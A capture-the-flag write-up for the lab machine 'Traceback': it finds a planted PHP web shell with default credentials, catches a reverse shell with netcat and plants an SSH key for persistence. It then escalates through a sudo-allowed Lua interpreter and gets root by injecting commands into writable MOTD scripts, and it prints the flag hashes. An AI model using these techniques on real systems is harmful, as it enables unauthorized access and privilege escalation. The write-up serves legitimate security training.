Traceback

TL;DR

  • Find the web shell on the website (smevk.php) and the credentials to log in
  • Use Lua to own sysadmin user.
  • Get root.txt through banners executed as root (MOTD)

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/traceback$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traceback.txt 10.10.10.181
# Nmap 7.60 scan initiated Fri Apr  3 18:06:02 2020 as: nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN traceback.txt 10.10.10.181
Increasing send delay for 10.10.10.181 from 0 to 5 due to 135 out of 448 dropped probes since last increase.
Warning: 10.10.10.181 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.10.10.181 from 640 to 1000 due to 190 out of 633 dropped probes since last increase.
Nmap scan report for traceback.htb (10.10.10.181)
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2020-04-03 18:06:02 CEST for 137s
Not shown: 52600 closed ports, 12933 filtered ports
Reason: 52600 resets and 12933 no-responses
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDbMNfxYPZGAdOf2OAbwXhXDi43/QOeh5OwK7Me/l15Bej9yfkZwuLhyslDCYIvi4fh/2ZxB0MecNYHM+Sf4xR/CqPgIjQ+NuyAPI/c9iXDDhzJ+HShRR5WIqsqBHwtsQFrcQXcfQFYlC+NFj5ro9wfl2+UvDO6srTUxl+GaaabePYm2u0mlmfwHqlaQaB8HOUb436IdavyTdvpW7LTz4qKASrCTPaawigDymMEQTRYXY4vSemIGMD1JbfpErh0mrFt0Hu12dmL6LrqNmUcbakxOXvZATisHU5TloxqH/p2iWJSwFi/g0YyR2JZnIB65fGTLjIhZsOohtSG7vrPk+cZ
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBD2jCEklOC94CKIBj9Lguh3lmTWDFYq41QkI5AtFSx7x+8uOCGaFTqTwphwmfkwZTHL1pzOMoJTrGAN8T7LA2j0=
|   256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL4LOW9SgPQeTZubVmd+RsoO3fhSjRSWjps7UtHOc10p
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr  3 18:08:19 2020 -- 1 IP address (1 host up) scanned in 137.40 seconds

So we find 2 useful services on 2 ports:

  • SSH (22)
  • Apache (80)

Let’s check the web server:

Owned

So it seems the website has already been compromised and the attacker has left a backdoor. We also find the following message in the HTML: “Some of the best web shells that you might need ;)”.

OSINT

The attacker has left us two clues: his name and the fact that the web shell might be popular.

With Google we quickly find the attacker’s Github account and especially a repository with the sentence “Some of the best web shells that you might need": https://github.com/Xh4H/Web-Shells

If we search for one of this PHP file on the website we find smevk.php.

Login webshell

We can login with admin:admin.

Webshell

Get a proper shell

This part we’ll be useful later, but it’s so much more pleasant to get an ssh access than to use the web shell that I did it as soon as I could get a shell.

I’ve started by uploading a reverse shell, the Pentest Monkey one, like everybody on the box it seems…

Then I’ve uploaded my ssh public key in the /home/webadmin/.ssh/authorized_keys to get an ssh session.

magnussen@funcMyLife:~/traceback$ nc -lvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from traceback.htb 50818 received!
Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 10:52:39 up 1 min,  0 users,  load average: 0.10, 0.05, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ cd /home/webadmin/.ssh
$ echo 'ssh-rsa AAAA... magnussen@funcMyLife' >> authorized_keys

Finally, I just had to connect with ssh:

magnussen@funcMyLife:~/traceback$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land



Last login: Thu Feb 27 06:29:02 2020 from 10.10.14.3
webadmin@traceback:~$

Admin Access

Now that we have a shell on the box, we can start to enumerate:

webadmin@traceback:~$ ll
total 44
drwxr-x--- 5 webadmin sysadmin 4096 Mar 16 04:03 ./
drwxr-xr-x 4 root     root     4096 Aug 25  2019 ../
-rw------- 1 webadmin webadmin  105 Mar 16 04:03 .bash_history
-rw-r--r-- 1 webadmin webadmin  220 Aug 23  2019 .bash_logout
-rw-r--r-- 1 webadmin webadmin 3771 Aug 23  2019 .bashrc
drwx------ 2 webadmin webadmin 4096 Aug 23  2019 .cache/
drwxrwxr-x 3 webadmin webadmin 4096 Aug 24  2019 .local/
-rw-rw-r-- 1 webadmin webadmin    1 Aug 25  2019 .luvit_history
-rw-r--r-- 1 webadmin webadmin  807 Aug 23  2019 .profile
drwxrwxr-x 2 webadmin webadmin 4096 Feb 27 06:29 .ssh/
-rw-rw-r-- 1 sysadmin sysadmin  122 Mar 16 03:53 note.txt
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit

We can run the /home/sysadmin/luvit as sysadmin. According to the note.txt, it seems that it’s a tool to execute LUA.

LUA is a scripting language.

A quick visit on GTFOBins shows us that we can abuse LUA to get a shell as sysadmin.

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit  -e 'os.execute("/bin/sh")'
$ /bin/bash
sysadmin@traceback:~$ cd /home/sysadmin
sysadmin@traceback:/home/sysadmin$ ll
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 ./
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ../
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache/
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local/
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh/
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit*
-rw------- 1 sysadmin sysadmin      33 Apr  3 15:23 user.txt
sysadmin@traceback:/home/sysadmin$ cat user.txt
d67827ba52f906a8df540376334d69e

I AM ROOT

Motd

Now that we have the user.txt, it’s time to get the root.txt.

After some enumeration on the server, we found the following running process:

root       2265  0.0  0.0   4628   828 ?        Ss   15:46   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

If we check the /etc/update-motd.d directory we see that it’s writable by our user (sysadmin), and as we saw previously, it’s run as root.

sysadmin@traceback:/home/sysadmin$ ll /etc/update-motd.d/
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 ./
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ../
-rwxrwxr-x  1 root sysadmin  981 Apr  3 15:54 00-header*
-rwxrwxr-x  1 root sysadmin  982 Apr  3 15:54 10-help-text*
-rwxrwxr-x  1 root sysadmin 4264 Apr  3 15:54 50-motd-news*
-rwxrwxr-x  1 root sysadmin  604 Apr  3 15:54 80-esm*
-rwxrwxr-x  1 root sysadmin  299 Apr  3 15:54 91-release-upgrade*

So we can execute commands as root by injecting command in one of this banners, we’ll just have to connect through ssh to display the banner and execute the command we want. But we have to be fast as this directory is erased every 30 seconds. We can print the /root/root.txt when we login with ssh.

I must admit, I’ve been lazy on this one and just printed the /root/root.txt, we could also have set up a reverse shell on one of this banner if we wanted to get a proper shell.

sysadmin@traceback:/etc/update-motd.d$ echo 'cat /root/root.txt' >> /etc/update-motd.d/00-header

And in an other terminal we login with ssh and retrieve the root.txt

magnussen@funcMyLife:~/traceback$ ssh webadmin@traceback.htb
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land

a10bbfef22291efa1edcbdce5ef9846a


Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Apr  3 16:09:49 2020 from 10.10.14.166

This was a nice box, not very difficult but a lot of fun! Thanks Xh4h for the box!